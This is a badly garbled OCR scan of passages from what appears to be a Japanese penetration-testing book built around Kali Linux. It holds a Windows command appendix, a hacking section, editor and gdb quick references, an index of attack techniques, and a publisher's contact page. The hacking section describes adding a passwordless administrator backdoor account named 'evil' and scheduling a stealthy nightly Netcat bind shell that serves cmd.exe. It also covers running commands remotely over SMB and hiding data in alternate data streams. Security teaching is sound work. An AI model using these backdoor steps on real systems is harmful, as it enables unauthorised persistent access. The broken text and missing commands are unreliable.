簡易 バッ ク ド ア アカ ウン ト を 作成 する 。 管理 者 権限 を 持つ evil ユ ー ザ ー (パス ワー 
ド は な し )。 


文字 列 を Base64 で エン コー ド す る 。 





Base64 で エン コー ド さ れ た 文字 列 を デコ ー ド する 。 


文字 列 を URL し エン コー ド す る 。 






URL エン コー ド さ れ た 文字 列 を デコ ー ド する 。 
-w : 文字 コー ド に UTF-8 を 指定 。 
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り に eo た だ に を ジロ ソン ん レル アア ル スル ンク 





ーー 


PS CN> | は PowerShell で の 実行 を 意味 し ます 。 


沙 大 本 コマ ンド 


>1pConT1ig /release 

DHCP に よる 動 的 I『 ア ドレ ス を 開放 する 。 

>1pcon 和 Tig /renew 

DHCP に よる 動 的 IP アド レス を 更新 する 。 

>1pcon†1g /d ュ splaydns 

DNS リゾ ル バ キ ャ ッシュ を 表示 する 。 

>1pcon 和 Tig / 和 lushdns 

DNS リゾ ル バ キ ャ ッシュ を 消去 する 。 

>sC query 

サー ビス 一 覧 を 表示 する 。 

>net vnew /domann 

ドメイン 別 挙 。 

>net view /domain : MORKGROUP 

WORKGROUP ドメイン に 属す る コン ピュ ー タ 一 覧 を 表示 する 。 
>net view /a11 

ワー ク グ ルー プ や ドメイン の コン ピュ ー タ 名 を 一 覧 表示 する 
>POute DP1n 

ルー ティ ング テー プル を 表示 する 

>systeminfo 


シス テム 情報 一 覧 を 表示 する 
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リモ ー ト マシ ン の シス テム 情報 一 覧 を 表示 する 。 た だ し 、 接続 先 の RPC の ポー ト 番 
号 が 解放 きれ て いる 必要 が ある 。 





シス テム 情報 の 詳細 を 表示 する 。 出 力 が 高速 。 





シス テム 情報 画面 を 表示 する 。 


LAN ア ダ プ ター の 詳細 情報 を 表示 する 。 MAC ア ドレ ス も 表示 され る 。 





イン スト ー ル され て いる ドラ イ バ ー を 一 覧 表示 する 。 





ドラ イ バ ー が デジ タル 著名 で 著名 済み か どう か を 確認 する 。 





イン スト ー ル 済み の 更新 プロ グラ ム の 一 覧 を HTML フ ァイル に 出力 する 。 
systeminfo コマ ンド で も 更新 プロ グラ ム を 確認 で きる が 、 類 維 に な りや すい 。 






2018 年 6 月 20 日 以降 の シス テム イベ ント の ログ を CSV ファ イル に 出力 する 。 た だ 
し 、 日 付 は GMT で ある 。WHERE 句 を 使っ て 表示 内 容 を 絞り 込め る 。 肥 大 化し た イ 
ベン トロ グ を 表示 し よう と する と 例外 が 発生 する こと が ある 。WHERE 句 で 絞り 込ん 
だ り 、 フ ァイル に 出力 し た りす る と よい 。 


レジ スト リ 設 定 を ファ イル に バッ クア ッ プ する 。 






レジ スト リ 設 定 を ファ イル か らら インポート する 。 
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通信 経路 を 確認 する 。 
-d : 名 前 解決 を 抑止 。 













ホス ト 名 に 対応 する IP アド レス を 調べ る 。 
IP アテ アド レス に 対応 する 完全 修飾 ドメイン 名 を 調べ る 。 
rsh advfirewa11 show currentprofi1e 


1rewal] show config 









ファ イア ウォ ー ル の 状態 を 確認 する 。 
た 


ポー ト 構成 を 表示 する 。 


許可 され た プロ グラ ム の 措 成 を 表示 する 。 


ファ イル や ディ レク トリ を 非 表 示 に する (隠し 属性 を 有効 に する )。 


カレ ント ディ レク トリ 内 に ある 全 フ ァイル を 非 表 示 に する 。 





チェ ッ ク サ ム 、 バ イト 数 、 フ ァイル 名 を 表示 する 。 







シス テム ルー ト の パス を 表示 する 。 


プロ モス の 情報 を 収集 する 。 





牧 定 の プロ セス の PID を 調べ る 。 
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ー: 代 = ュ ] ] 


指定 し た PID の プロ セス を 終了 する 。 
/F : 強制 終了 。 


現在 日 を 表示 する 。 


現在 時 刻 を 表示 する 。 た だ し 、 秒 は 表示 され な い 。 


現在 日 時 (年 月 日 、 時 刻 ) を 表示 する 。 秒 も 含む 。 






















プロ セス 情報 を 表示 する 「%cpu] と ワー キン グセ モット サ イズ も 表示 され る が 、 す べ 


て 表示 する の に 若干 時 間 が か か る 。 







層 ま と ビス を 表示 する 。 


に 吐き - こ ビ コ 





Security イベ ント ログ か ら 、 次 の イン スタ ンス ID を 持つ も の を 列挙 する 。 
4624 (アカ ウン ト の ログ イン 成功 ) 
4634 (アカ ウン ト の ログ オブ) 















localhost の NetBIOS リ モー トキ ャ ッシュ ネー ム テ ー ブ ル を 表示 する 。 


プロ ンプ ト の 表記 を 変え る 。 特殊 コー ド に つい て は prompt /? コ マン ド で 確認 す 
な 


プロ ンプ ト の 表記 を 戻す 。 










テキ スト を 表示 する 。 





文字 列 (ここ で は "Hello World") を 出力 する 。 


消 ハッ キン グ 関 係 








毎日 夜 12 時 に Netcat の 簡易 バッ ク ド ア (バイ ンド シェ ル ) を 起動 する 。 
-d: ステ ルス モー ド 。 コ マン ド プ ロン プ ト 画 面 な し で 動作 する 。 

-L : セッション 切 断 後 も 継続 し て LISTEN する 。 

-p : 待ち 受け る ポー ト 。 

-e cmd.exe : 接続 時 に シェ ル を 起動 する 。 






SMB 経 由 に より 、 タ ー ゲ ッ ト 端 末 で ipconfg コ マン ド を 実行 する 。 


RigRipper で NTUSERDAT の 情報 を 出力 する 。 


ADS (Alternate Data Streams : 代 凌 デー タス トリ ー ム ) の 作成 。 NTFS は ADS を 
サポ ー ト し て いる 。 "testtxt' ファ イル に 、"hoge.txt' を ADS と し て 保存 する 。 





ADS を 含む ファ イル を 表示 する 。 「:$DATA」 と 付い て いる ファ イル が ADS で あ 
る 。 


ADS で ある "hoge.txt" の 内 容 を 表示 する 。 





ADS の ファ イル "hoge.txt' を 削除 する 。 
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4 | Windows で すばやく ブロ グラ ム を 起動 する 





Windows で は 、[Win] + [r] キー で 「 フ ァイル 名 を 指定 し て 実行 」 画面 を 表示 で 
さき 、 こ こ に コマ ンド を 入力 する こと で 、 す ば や く プ ログ ラム を 起動 で きま す ( 表 2)。 
また 、 検 索 ボ ックス か ら も ブロ グラ ム を 起動 で きま す 。 検索 ボッ クス で あれ ば 、 信 中 
まで 入力 する だ け で 候補 を 表示 し て くれ ます 。< 


表 2 プロ グラ ム を 起動 する コマ ンド 


Windowe ファ イア ウォ ー ル 
志 プ ショ ン 
電卓 Calc.exe 

ロー カル セキ ュ リ ティ ポリ ンー 
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5 | 環境 変数 を 使っ て フォ ル ダ ー に アク セス する 





Windows で は 、 よ く 使 う フ ォ ル ダー 名 な ど に 変数 が 割り 当て られ て いま す 。 例え 
ば 、 一 般 に プロ グラ ム の 設定 デー タ は 、 ロ グイ ン ユ ー ザ ー ご と に C:\Users\< く ユー 
ザー 名 >\AppData\Roaming" フォ ル ダ ー に 格納 され ます 。 エ クス プロ ー ラ ー で こう 
し た 深い 階層 の フォ ル ダ ー に 移動 する の は 手間 が か か り ま す 。 実 は せ 、 こ の フォ ル ダ ー 
に は %AppData%" と いう 環境 変数 が 割り 当て られ て いま す 。 こ の 事実 を 活用 すれ 
ば 、 エ クス プロ ー ラ ー で "%AppData%" を 指定 する だ け で 移動 で きま す 。 

他 に ゃ Windows で は 、 主 要 フ ォ ル ダー に 対し て 表 3 の よう な 環境 変数 が 設定 され 
て いま す 。 特 に 、"%AppData%" や "%Temp%" は 使用 背 度 が 高い の で 、 ぜひ 覚え て お 
く と よい で し ょ う 。 これら の 環境 変数 を 利用 する と 、 Windows の プロ グラ ム が シン プ 
ル に な り ま す 。 


表 3 主要 フォ ル ダ ー の 環境 変数 


C:\Users\ く ユー ザー 名 >\AppData\Local\Temp 


26Public% C:\Users\Public 
C:\Users\ く ユー ザー 名 >\AppData\Local\Temp 


C:\Users\< く ユー ザー 名 > 
96WinDir2% C:\Windows 
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『 に El クロ と に 人 を と 4 た 





nano は [Dell キー で 普通 に 文字 を 消せ て 、 矢 印 キ 二 で カー ソル を 移動 で きま す 。 
また 、 よ く < 使う オプ ショ ン は 、 エ ディ ター の 下部 に 表示 され ます 。 そ の た め 、uvi よ り 


も 息 え や すい か も し れ ま せん ( 表 4)。 


表 4 nano の 簡易 コマ ンド 表 


[Ctrl 十 [ol 

[Ctrl 十 [ 

[Ctrl 十 [xi ラ [y 

[Ctrl 十 [| ラ In 
ソル 移動 

[Ctrll 十 [yl 

[Ctrl 十 [VM 

[AI 十 員 J 

[AI 十 


[Ctrl 十 【k] 
[Ctrll 十 【 


[Ctrll 十 [W] 検索 文字 列 [Enter 


[Ctrl 十 [W] 
[Ctrll 十 


[Ctrll 十 [回 
[Altl 十 
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上 書き 保存 
保存 し な いで 終了 


1 画面 進む 
1 画面 戻る 
ファ イル 先頭 
ファ イル 末尾 


1 行 を カッ ト 


棟 索 
一 度 検索 し た 文字 列 を 再度 検索 
検索 文字 列 を 変更 


アン ドゥ ( 探 作 の 取り 消し ) 
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ガ | Vi の 簡易 コマ ン ド 表 





介し ます ( 表 5)。 


表 5 vi の 簡易 コマ ンド 表 


中 
| 


イン サー トモ ー ド に 移る (カー ソル の 前 ) 
イン サー トモ ー ド に 移る (カー ソル の 後ろ ) 

ESC 編集 モー ド に 移る 

ーー 

上 に 移動 

下 に 移動 

左 に 移動 

右 に 移動 

先頭 行 に 移動 

最終 行 に 移動 

行頭 に 移動 

行末 に 移動 

mn 行 目 に 移動 

カー ソル が 画面 中 央 に な る よう に スク ロー ル 


コ 「 コ 
て を 
I | 
* 
KK 


ファ イル を 保存 する 


EZ77TTrE 
Ed | 終 7 す る 5 5 5 5 11)!1!{!t{〔{〔{〔W 
Ed | 秋 


変更 を 保存 せ ず に 終了 する 


カー ソル 文字 を 削除 

直前 の 1 文字 を 削除 

カー ソル 行 を 削除 

アン ドゥ (直前 の コマ ンド 操作 を 取り 消す ) 


ュ デ 
rl 填 
ei 
- | 
に 
| 
Cyt 
L 
て 
| 


/word word を 前 方 検索 


2word WOrd を 後方 検索 
| 次 の 候 科 
前 の 候補 





8 | gdb の 簡易 コマ ンド 表 





デバ ッ ガ ー で ある gdb を 起動 する と 、gdb プロ ンプ ト が 返っ て き て 対話 的 に コマ ン 
ド を 入力 で きま す 。 主 な コマ ンド は 表 6 の 通り で す 。 


表 6 gdb の 主 な コマ ンド 


EFZ 2 還 間 7. 提 間 
mein 関 数 に ブレ ー ク ボイン ト を 張る 。 
main 関 委 で 自動 的 に 止ま る よう に 実行 する 。 


ンー ス の 人 に ブレ ー ク ポイ ント を 設定 する 、 


を 設定 する 。 


アド レス に ブレ ー ク ポイ ント を 設定 する 。 

break * ア ドレ ス 例 : アド レス 0x80808080 に ブ プレー ク ポ イン ト を 
設定 する 。 
break *0x80808080 


ブレ ー ク ポイ ント を 無効 に する 。 
Inext 。 。 。 。 。 。 | ステ ッ プ 実行 する 。 た だ し 、 関 数 内 に 入ら な い 。 
現在 の 関数 の 実行 を 完了 する 。 呼 び 出し 元 に 戻る 。 


変 雪 を 表示 する 。 

・ 表 示 フ ォ ー マ ッ ト :s 王 文字 列 、 ji= ニ 命令 、o=8 進 
Q ニー 

符号 付き 10 進 数 、 u= ニ 符号 な し 10 進 数 、c= 文 字 、 

ョ アドレス 


メモ リ を ダン プ す る 。 
例 : Oxfff44002 番地 の 内 容 を 表示 する 。 
。 x Oxfff44002 
例 : プロ グラ ムカ ウン ター が 指し て いる 位置 の 内 容 
を 表示 する 。 
X や DC 


print[/< 表 示 フ ォ ー マ ッ ト >] < 変数 >" く ポ 
イン タ 変 雪 >!&< く アド レス 変数 > 
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コマ ンド | 動 作 

アド レス また は レジ スタ ー の 中 身 を 表示 する 。 
・ デ ー タ サイ ズ : b テ 1 バイ ト 、 h 三 2 ク バ イト 、w 三 
4 バイト 、 豆 三 8 バ イト 

・ 表 示 フ ォ ー マ ッ ト : print の 表示 フォ ー マ ッ ト に 加 
えて 、s 王 文字 列 、i= 命 令 

例 : 0x20108b48 番 地 か ら 10 バ イト 分 を 16 進数 
表示 する 。 

Xx/10xDb 0x20108b48 

例 : プロ グラ ムカ ウン ター が 指し て いる 位置 か ら 3 
個 表示 する 。 

X/3 $pc 


引数 で 指定 し た スタ ッ ク フ レー ム を 見 る 。 


1 つ 上 の フレ ー ム に 移動 する 。 
実行 は し な い 。 コ ー ド 表示 の 移動 の み 。 


実行 は し な い 。 コ ー ド 表示 の 移動 の み 。 
mgadk ニニ 。。。。 | し ス タッ ク の 一 覧 を 表示 する 。 


レジ スタ ー の 中 身 を 表示 する 。 

例 : レジ スタ は 変数 と し て も 参照 で きる 。 頭 に $ を 
付け れ ば よい 。 変数 な の で 、display コマ ンド に 設 
定 で きる 。 


Info locaIs や”〔 こ ご) ニ つこ)==。。 | 関数 内 の 局所 変数 の 名 前 と 値 を 表示 する 。 
存在 する スレ ッ ド の 一 覧 を 表示 する 。 





x/< 繰 り 返 し 回 才 >< 表 示 フ ォ ー マ ッ ト >< 


デー タ サ イズ > < アド レス >j く レジ スタ ー> 





info regiSter ベレ ジス ター> 





file く < ファ イル 名 > ファ イル を 選択 する 。 


| 
> いる ファ イル を 10 生 9 表す る 。 
ん 


レジ スタ ー、 ア ドレ ス 、 変 才 の 中 身 を 変え る 。 
例 : eax を 4 に 書き 換え る 。 


Set < 名 前 > = < 値 > Set Seax = 4 
例 : アド レス Oxffffa622 を 15 に 書き 換え る 。 
Set IintIOxffffa622 = 15 


スタ ッ ク を 見 る 。 



















1 
に 
ss | 


M 
アド レス に ある 命令 か ら 実行 を 再開 する 。 
set res [コマ ンド ライ ン 3 
ae 人 人 全 寺 fs。 


gdb で も 役に立ち ます が 、gdb-peda (https://github.com/longld/peda) に する と 、 
より 解析 が は か どり ます 。Kali に イン スト ー ル する に は 、 次 の よう に 入力 し ます 。 








FootQ⑩ka11:<# g ュ モト c]1one https : / /github . com/1ong1d/peda.git </peda 
root@Qka1i:<# echo "source </peda/peda. py" >> </ . gdbinit 


イン スト ー ル 後 、gdb コ マン ド を 実行 し ます 。「gdb$] プロ ンプ ト で は な く 、「gdb- 
peda$] プロ ンプ ト が 表示 され て いれ ば ぱ ば 、gdb-peda の 動作 に 成功 し て いま す 。 従来 の 
gdb の コマ ンド に 加え て 、peda 専用 の コマ ンド が 用 意 さ れ て いま す 。 ま た 、 各 レジ ス 
ター、 コ ー ド 、 ス タッ ク が 同時 に 表示 され る の で 解析 の 効率 が 上 が り ま す 。 
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索引 





※ 吉 種 コ マン ド は 、 巻 未 付録 を 参照 し て くだ さい ^。 


数 字 ・ 記 号 
人 4-way handshake ……………… バ らら 9 
Torrent ……ーーー ド ドー っ 品 
A-E 
AOPE ーー ドド ピー トー 4 
Adobe FlaSh ホバー ニーーー… 03 
AirPcaD NX ーー ロロ 4 
APT 上 ーー ドド ドド ピピ ーー 1 2 コ 
AA 品 スキ ヤン ロ 1 ピロ 
ARP ーーt ト ーー ドド ドド ドド ーー 467 ア 
TDSDOOf …… ド ーー 479 
ARP 応答 ………ーーー ド ーー 467 
AHP キャ ッシュ ポイ ゾ ソニ ング ‥ 476 
に た アー イイ ジジ ーーー" 人 4/6 
ARHP テー ブル … ド で rr の re ーー 464 
ARP パケ ッ ト で oo …… 469 
ARP 要求 ……… や 上 ーー ドド ーー 4567 
ARP 要求 リプ レイ 攻撃 ……… らら 
AutoPlay ……0oi の io の rr の の ご I ] 73 
BeE ト F tt(i((( つ i ド ドド ドド ーッ 49 ロ 
BinTexXt 上 李 r 人 入 …ー ビ ニー 786 
BIOS ドド ドド vNN- ド いつ に つつ に に に に に ーー の 1] 0) 
Blu6SCreenVIeW で で で emem 14/ 
BUTD で ドド ドド 5613 
bDWAPP bee-DOX …… ド ドド … ド ドド … 65624 
Chrome リモ ー ト デス クト ッ プ 
YYTYYTYYYTTTYYYYTYYYYYYY エ YY ャ で ャ ャ ャ テ 3 1 
CLauUnCh 和 や 人 層 (ドー 1 7 ア 
CrackStatiOnl い ビー ド ド ド …… 610 
Deauthentication アタ ッ ク …‥ 563 
[JeAuth パケ \ ツ ト すす ミミ ミミ ミミ すす すす ロ 3 
DIM ブ プー トー ドド < トト < こ ここ ここ ここ ここ フ 3 ア 
DNS サー バー ーー… ド ドド ドド ーー ノ 5 
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DNS スプ ー フ ィング ………… 498 


DoS アタ ッ フ ク の remmr…r……… 5 ザ 4S 
DriftnBt_…… バ ビニ M バ t い ドド lsfst ら 
DropDOX ……… の ii 194 
DVWA ーー ドド ドド ドド トド < ロコ 4 
Fthernet 99 レーム の の の の 6 0 6 の の: の 6 ee e 4466 
F-J 
feh 上 …… ド トト ドド ッ トット ーーー 3 っ 2 
FH ら 5 の ロ ] 
Fl ーー ド tu で < トト 643 
findmyhash ………ー ド ーー 651 ] 
FinE oe に 3 
FIN ワル ーー ヤ 。 の で の や. の の の の の や の の の の の の の の る 24 ロ 3 
FMS アタ ッ フ ク …… ド ドド ドー… いつ 
FTP tt つつ ド ドド ーー 49 
Gt 上 ーー ドド ドド ドド ドー 18 ピ ロ 
( ゝ ト FxXtenSIOS oooooooeeeoeeoooeoe ] き 
Gt for WindOWS で eeerrrrrr 19 ど 
( ゝ 【 チー ゴザ チゲ ト ooooeooeoooeoeeoeeoee ] の 
GNOME TweakS ……………… ] 1 4 
Google Drive … io oi in 195 
Gparted …… で oon 5699 
GRHUB … 二 に に に に に ツー 45 
(1K の GoG の op る る る の の ららら る ら る る で らら らら もら の @ ら gi@ 51a1 條 | 
Hydra …… に eeernrrrm 3 
IDOnVe[t ICOS 本人: の っ 48 
Image File EXeCutiOn UDtIOnS 

すす て TTY すす 673 
IP アド レス ドー 64 7 フ ア 
| ロ 転送 機能 本 人 人: 和信: 人 (の: 2483 
JOhn {he RIDDer ヤー の ら 4 
K-0 
Kall LU 上 ①ー( 和 ニニ ボ ーー ドーー…… 37 38 
KeyIOg reCOrder 9. がい: つけ ] 
KoreK chopchOD アタ ッ ク 

を あ を ま も が が を すら すま な な ます 538.546 


LAN ーー ドド ドド ドド oo 565 


AN アダ プター YYYYTYTYTYYYYYY で すず る 1 
La/Zagn@ TPYYYYTYYYYYYYYYYY す すす すず つづ の 
LFE ーー ドド ドド ピピ ピピ ーー 643 
LDHUX … ド ーー に ドド ドド ドド ドド ドド ピー ドー つづ / 
jnUX カー ネル TTYTTTYTTTYYTY で すす つづ / 
Llnuk ディ スズ トリ ピュ ーション … 3/ 
IQCalIhOST ーーー ニー ババ ナ チ ババ ナーー…ーー ロロ 
MacChanger で です すす すす すす で です で で ロ D8 
MacCroShOD ドド で ドド ャ ドミ ャ すす つづら の 
MAC ア ドレ ス すす で で エエ で で す エ エエ で すす 4 の 
MAC ア ドレ スズ ステー ラル ……… 人 4/ づ 
Tanghtml ……ーーーー 1 3 の 
Managed モー ド ……… ら 509. 5 ら 5 
MD5 UnllnBE_ で ーーー 50 
MGtBBHIONE ………wー…… ど ご ご , づ 1 ど 
MetaSDIOItaDle ECETYEYTTEEYTTP つづ DD 
MeterDreter です です で で で すす で すす すす すす すす すす 4 
MICTOSO 人 FEOgG EETTETTTTYE で で すす ロロ 
MIIMTE ーー トッ トド oe 48/ 
MDI 一 ドド mm 509. 529 
MHRHU It に に に つづ つづ 3 
NMNAPT で に … で ーー ドド に に 1 
NAS eo h 導 まだ 。 
NAT ti mi ドド oo 69. ま 
NAT ネッ トワ ー フ クー rr の ド ドー の 
NetC コ ギニー ゴー ドド ーー どど は. 4 ] 
Netcat fOr WindOWS ………… どど 
NetWOTKMIDBEF 上 上 …… ド ーーーー… 434 
NL スエ キャ リア CCFI よ ナミ エミ ドミ ミナ ミミ ミミ ミミ すか 2456 
(CS ーー ドド ドド ドド に ピー 24 の / 
(ne[JTIVB_ 上 t ピ ー"i ド ーー 1 5 
Online ICO converter ……… う 48 
OWASP TOoD 10 プロ ジェ クト 

テイ で で すす で すす すす すす すす で すす で エエ ャ ミ す ャ すす すす で 6 の 4 
P-T 
PaSS {the HaSsh ドド トード ーーーーー… の 4 


DatatOF TTYTYYYYYYYYYYYYYYEYYY ャ YYY 夫 s 他 1 
PDU ドー ポート ト ドド ドド に ドド ーー 2 の の 
ロ ヒ 5 か っ イル TTYTTTYYYYTYYYYYYYYY で と アロ 1 
PHP Code Injection 攻撃 …: 627 
Ping スイ ー プ で です です で で すす すす すす す すす 2 ト () 
Ping スキ ャ ヤ EEECECEEEEEEEEETEESE お 24 ト () 
DID TTYTYYTYTYYYYYYYETYTYLLEYKLK エ さと の (5 
PMK ーー ドド ドド ーー ロ 6(J 
POGeTOS ネー ボ ポ ネツ ナ 安 ー ヨ ポ uーー 3 
POnWeTShel ーーーーーーー…ー 186 
Prefetch 上 … ド ーー…ーー ド ーー 1 コロ 
PTK ーー ドド ドド ドド ーーー ロ 6() 
PTW アダ ツ ク で すす すす すす で で すす で すす で で で いづ 8 
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本 書 内 容 に 関す る お 問い 合わ せ に つい て 


この た び は 翔 泳社 の 書籍 を お 買い 上 げ い た だ き 、 誠 に あり が と う ご ざ いま す 。 名 社 で は 、 読 者 の 赤 様 か 
ら の お 問い 合わ せ に 適切 に 対応 きせ て いた だ くだ ため 、 以 下 の ガ イド ライ ン へ の ご 協力 を お 願い 致し て お 
り ま す 。 下記 項 目 を お 読み いた だ き 、 手 順に 従っ て お 問い 合わ せく だ さい 。 


ご 質問 され る 前 に 
吉 社 Web サ イト の 「 正 誤 表 」 を ご 参照 くだ さい 。 こ れ ま で に 判明 し た 正誤 や 追加 情報 を 掲載 し て 
いま す 。 


正誤 表 https//www.shoeisha.cojp/book/errata/ 


@ ご 質問 方 法 
発 社 Web サ イト の | 刊行 物 Q&EA」 を ご 利用 くだ さい 。 


刊行 物 Q&A https://www.shoeisha.cojp/book/qa/ 


イン ター ネッ ト を ご 利用 で な い 場 合 は 、 FAX また は 郵便 に て 、 下 記 “ 翔 泳社 愛読 者 サー ビス セ 
ンタ ー" まで お 問い 合わ せく だ さい 。 
電話 で の ご 質問 は 、 お 受け し て お り ま せん 。 


免 回 答 に つい て 
回 答 は 、 ご 賢 問 いた だ いた 手段 に よっ て ご 返事 申し 上 げ ま す 。 ご 質問 の 内 容 に よっ て は 、 回 答 に 
数 日 な いし は それ 以上 の 期間 を 要する 場合 が あり ます 。 


佑 ご 質問 に 際 し て の ご 注意 
本 書 の 対象 を 越え を る も の 、 記 述 個所 を 特定 され な いも の 、 ま た 読者 固有 の 環境 に 起因 する ご 質問 
等 に は お 答え で きま せん の で 、 了 予め ご 了承 くだ さい 。 


今 郵 便 物 送付 先 お よび FAX 番号 
送付 先住 所 〒160-0006 東京 都 新 宿 区 舟町 5 
FAX 番号 03-5362-381S 
宛先 (株 ) 翔 泳社 愛読 者 サー ビス セン ター 


※ 本 書 に 記載 され た URL 等 は 予告 な く 変 更 き れる 場合 が あり ます 。 

※ 本 書 の 出版 に あたっ て は 正確 な 記述 に つと め ま し た が 、 著者 や 出版 社 な どの いずれ も 、 本 書 の 内 容 に 対し て な ん ら 
か の 保証 を する も の で は な く 、 内容 や サン プル に 基づく いか な る 運用 結果 に 関し て も いっ きい の 資 任 を 負い ませ ん 。 
※Kali Linux の ダウ ン ロ ー ド 時 は 最新 バー ジョ ン を 選び 、 バ ー ジ ョ ン 番 号 の と ころ は 読み 替え て くだ きい 。 


りゃ る する ゃ を るる すみ する すず する する する する す ゃ も すす る で る を すす る する すす する で すす る ず すす る する する する ず すす ゃ も です る で る すす る すす る する する を る すす する する ずる イ すす % る キャ る や る すす る すす する る する る する すず すず q 


※ 本 書 に 記載 され て いる 会 社名 、 製 品名 は それ ぞ れ 各社 の 商標 お よび 登録 商標 で す 。 
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